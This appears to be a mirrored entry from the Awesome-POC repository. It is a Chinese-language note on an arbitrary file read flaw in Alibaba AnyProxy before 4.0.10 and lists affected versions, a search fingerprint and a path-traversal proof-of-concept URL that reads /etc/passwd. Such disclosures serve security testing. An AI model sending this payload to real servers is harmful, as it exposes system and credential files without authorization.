admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 03:17:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Alibaba AnyProxy fetchBody 任意文件读取漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

453 B
Raw Blame History

Alibaba AnyProxy fetchBody 任意文件读取漏洞

漏洞描述

Alibaba AnyProxy 低版本存在任意文件读取,通过漏洞,攻击者可以获取服务器敏感信息

漏洞影响

Alibaba AnyProxy < 4.0.10

网络测绘

"anyproxy"

漏洞复现

页面如下

验证POC为

/fetchBody?id=1/../../../../../../../../etc/passwd